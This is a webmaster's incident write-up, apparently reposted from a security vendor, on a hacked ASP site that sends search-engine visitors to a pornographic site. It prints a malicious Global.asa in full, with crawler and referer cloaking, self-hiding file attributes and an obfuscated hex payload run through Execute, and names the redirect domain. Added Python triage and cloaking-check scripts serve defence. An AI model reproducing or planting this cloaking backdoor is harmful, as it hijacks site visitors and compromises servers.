Website Hacked: A Webmaster's Solution

Source: Internet
Author: User
Keywords: website hacked


Recently, every result for our company's website that was clicked in Baidu search opened a pornographic site, while typing the URL in directly caused no problem. Baidu search also showed a warning that the site had been hacked. Many customers searching for our site ended up on the pornographic site, which did great damage to the company's image. As the company's website technician, with five years as a webmaster behind me, I was not frightened by this, and I started by analyzing why the site had been hacked.

Starting from what Baidu had indexed

A site: query in Baidu for our own website turned up many snapshots with pornographic content: movies, female hosts and so on, more than 300 snapshots in all. Then I looked at how the home page had been indexed and found it unrecognizable: the Baidu snapshot was empty, the title was just the site's address, and the content was empty too. I realized the site must have been dropped (K'd) by Baidu.

Opening any one of these addresses jumped straight to the pornographic site, whose address is: http://mrr.8800.org/mm/


The problem is slowly surfacing

On the surface, the first symptom is a flood of indexed pages for the site, many of them containing malicious and illegal content (pornography and so on). The other symptom is that clicking through from a search engine automatically jumps to the pornographic site, while entering the site's address directly does not. At this point I was sure the problem was in the site's program. Logging in to the hosting space over FTP, I found many unfamiliar folders in the root directory; the site files inside them could not be deleted and kept reporting that I had no permission to delete them. Looking further down through the directories, I saw a strange file name, Global.asa, which the Sinesafe Trojan detection tool identified as a Trojan file. Its contents are as follows:

    <script runat="server">

    ' Web site global file

    Sub Application_OnStart
    End Sub

    Sub Application_OnEnd
    End Sub

    Public Function gethtml (URL)
        Set objxmlhttp=server.createobject ("Msxml2.serverxmlhttp")
        Objxmlhttp.open "Get", Url,false
        Objxmlhttp.setrequestheader "user", url
        Objxmlhttp.send
        Gethtml=objxmlhttp.responsebody
        Set objxmlhttp=nothing
        Set objstream = Server.CreateObject ("ADODB.stream")
        objStream.Type = 1
        Objstream.mode =3
        objStream.Open
        Objstream.write gethtml
        objstream.position = 0
        objStream.Type = 2
        Objstream.charset = "gb2312"
        gethtml = Objstream.readtext
        objStream.Close
    End Function

    Function Check (user_agent)
        Allow_agent=split ("Baiduspider,sogou,baidu,sosospider,googlebot,fast-webcrawler,msnbot,slurp,qihoobot, Youdaobot,iaskspider ",", ")
        Check_agent=false
        For Agenti=lbound (allow_agent) To UBound (allow_agent)
            If InStr (User_agent,allow_agent (agenti)) >0 Then
                Check_agent=true
                Exit For
            End If
        Next
        Check=check_agent
    End Function

    Function Checkrefresh ()
        Checkrefresh = False
        Dim Botlist,i,repls
        Krobotlist = "Baidu|google|sogou|soso|yahoo|bing|youdao|qihoo|iask"
        Botlist = Split (krobotlist, "|")
        For i = 0 to Ubound (botlist)
            If InStr (Left (Request.ServerVariables ("Http_referer"), ""), Botlist (i)) > 0 Then
                Checkrefresh = True
                Exit for
            End If
        Next
    End Function

    Sub Session_OnStart
        On Error Resume Next
        . ServerVariables ("path_translated")
        Set s=server.createobject ("Scripting.FileSystemObject")
        Set F=s.getfile ("//./" & Server.MapPath ("/global.asa"))
        V=request.form&request.querystring
        If InStr (V, ". Asa") >0 Then
            f.attributes=39
            Response.End ()
        End If
        If InStr (Name, ";") >0 OR InStr (server. MapPath ("."), ". as") >0 Then
            S.getfile (name). Attributes=0
            S.deletefile (name)
            f.attributes=39
            Response.End ()
        End If
        S= "636e6e62643d6c6361736528726571756573742e736572766572:o=": For I=1 to Len (s) step 2:c=mid (s,i,2): If isnumeric (Mid s,i,1)) Then:execute ("O=O&CHR (&h &c&)"): Else:execute ("O=o&chr &h" &c&mid (s,i+ 2,2) & "): I=i+2:end If:Next:execute O
    End Sub

Looking at this code left me a little dizzy.

The line containing "Baiduspider,sogou,baidu,sosospider,googlebot,fastwebcrawler,msnbot,slurp,qihoo" is the conditional jump code for search engines. In other words, the Trojan keys on search engines: any visit that comes from Baidu, Sogou or Google jumps straight to the site the attacker has set.

There is also some binary code that has been encrypted. I do not know how to decrypt it, but my analysis is that it is the jump URL he set. I asked a few friends to look at the code, and my good friend Lao Liu said there is a conditional jump based on cookies and IP: the same IP and cookie will trigger the pop-up only once and not a second time. The hacker's technique is very clever, and it shows what sinister tricks people will use for profit. This code is very stealthy and almost impossible for webmasters to detect.
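A static triage pass over a file like the Global.asa above, added here as an example (it is not the author's code and not how the Sinesafe tool works): it flags the cloaking indicators, decodes hex runs as text instead of executing them, and names the bits in attribute writes such as attributes=39, which make a file read-only, hidden and system. The indicator patterns, the GB2312 decoding and the sample excerpt are assumptions built from the listing.

```python
import re

# Bit values of the Scripting.FileSystemObject "Attributes" property.
FSO_BITS = {1: "ReadOnly", 2: "Hidden", 4: "System", 32: "Archive"}

# Heuristics taken from the Global.asa listing above (assumed, not a signature set).
INDICATORS = {
    "crawler User-Agent list": r"baiduspider.{0,200}googlebot",
    "Referer inspected": r"http_referer",
    "server-side HTTP fetch": r"msxml2\.serverxmlhttp",
    "Execute on a built string": r"\bexecute\b",
}
ATTR_SET = re.compile(r"\.\s*attributes\s*=\s*(\d+)", re.I)
HEX_RUN = re.compile(r"\b(?:[0-9a-f]{2}){12,}\b", re.I)


def attribute_flags(value):
    """Names of the FSO attribute bits set in value."""
    return [name for bit, name in FSO_BITS.items() if value & bit]


def decode_hex(run):
    """Turn a hex run into text without executing it (GB2312 is an assumption)."""
    return bytes.fromhex(run).decode("gb2312", errors="replace")


def triage(text):
    """Static report for one script file: indicators, attribute writes, decoded hex."""
    return {
        "indicators": [n for n, p in INDICATORS.items() if re.search(p, text, re.I | re.S)],
        "attributes": {int(v): attribute_flags(int(v)) for v in ATTR_SET.findall(text)},
        "decoded": [decode_hex(h) for h in HEX_RUN.findall(text)],
    }


# Constructed excerpt adapted from lines of the listing above.
SAMPLE = '''
allow_agent=split("Baiduspider,sogou,baidu,sosospider,googlebot,msnbot", ",")
If InStr(Request.ServerVariables("http_referer"), botlist(i)) > 0 Then
f.attributes=39
s="636e6e62643d6c6361736528726571756573742e736572766572"
execute o
'''

if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(key, "->", value)
```

The hex fragment visible in the listing decodes to the start of a VBScript statement; the rest of the string is cut off on this page, so the decoded text stops there.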

With the root cause found, solve the problem

I downloaded the site's source code from the hosting space and ran it through the Sinesafe Trojan detection tool, which found many Trojan files, among them global.asa, z.aspx, cende.asp and phzltoxn.php. I will not publish the Trojan code here. Without further ado, I clicked to clean the Trojans and deleted them all. For the files that FTP could not delete, I went to the hosting provider and had them delete and empty the directories directly on the server. The last step was to change the site's back-end password. Last year's CSDN password leak really made people worry. I took a loss from it myself: my CSDN password and my mailbox password were the same, so my mailbox was stolen and money was withdrawn from my Alipay. I will remember that loss for a lifetime; once bitten, ten years shy!

After changing the password and the database address, I uploaded the cleaned site files back to the hosting space, and site access returned to normal. The traces the hacker had left in Baidu I submitted to the Baidu Complaint Center, explaining why the site had been hacked; once Baidu's update cycle has passed, the problem should be solved.

It was a hard road all the way, but experience is the most valuable thing, and I hope the solution above can help more people who need it. Every webmaster's experience is different; if we can share selflessly, the webmaster road will take us further! Source of this article: server security www.sinesafe.cn. First published on A5; reprints are welcome, please credit the author and the source. Thank you!
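A check to run against your own site after re-uploading the cleaned files, added here as an example (not from the original article): it requests the same URL as a direct visitor, as a visitor arriving from a search result, and as a crawler, and reports any profile that gets a different answer. The header values, the stand-in sites and the placeholder redirect target are constructed assumptions.

```python
import hashlib
import http.client
from urllib.parse import urlsplit

BROWSER = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
# Request profiles: only the headers the Global.asa listing inspects are varied.
PROFILES = {
    "direct visit": {"User-Agent": BROWSER},
    "search click": {"User-Agent": BROWSER, "Referer": "https://www.baidu.com/s?wd=test"},
    "crawler": {"User-Agent": "Mozilla/5.0 (compatible; Baiduspider/2.0)"},
}


def http_fetch(url, headers):
    """GET url once without following redirects; returns (status, Location, body)."""
    parts = urlsplit(url)
    https = parts.scheme == "https"
    conn = (http.client.HTTPSConnection if https else http.client.HTTPConnection)(
        parts.netloc, timeout=10)
    try:
        path = (parts.path or "/") + ("?" + parts.query if parts.query else "")
        conn.request("GET", path, headers=headers)
        resp = conn.getresponse()
        return resp.status, resp.getheader("Location"), resp.read()
    finally:
        conn.close()


def cloaking_report(url, fetch=http_fetch):
    """Profiles whose response differs from a direct visit (empty list = consistent)."""
    seen = {}
    for name, headers in PROFILES.items():
        status, location, body = fetch(url, headers)
        seen[name] = (status, location, hashlib.sha256(body).hexdigest())
    return sorted(n for n, fp in seen.items() if fp != seen["direct visit"])


# Constructed stand-ins for a site before and after cleanup, so the check runs offline.
def infected_site(url, headers):
    if "baidu" in headers.get("Referer", "").lower():
        return 302, "http://redirect.invalid/", b""
    if "baiduspider" in headers["User-Agent"].lower():
        return 200, None, b"<html>injected spam page</html>"
    return 200, None, b"<html>company home page</html>"


def clean_site(url, headers):
    return 200, None, b"<html>company home page</html>"
```

Pages that legitimately change on every request (timestamps, rotating content) will also show up as differences, so compare a static page or normalise the body before hashing.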
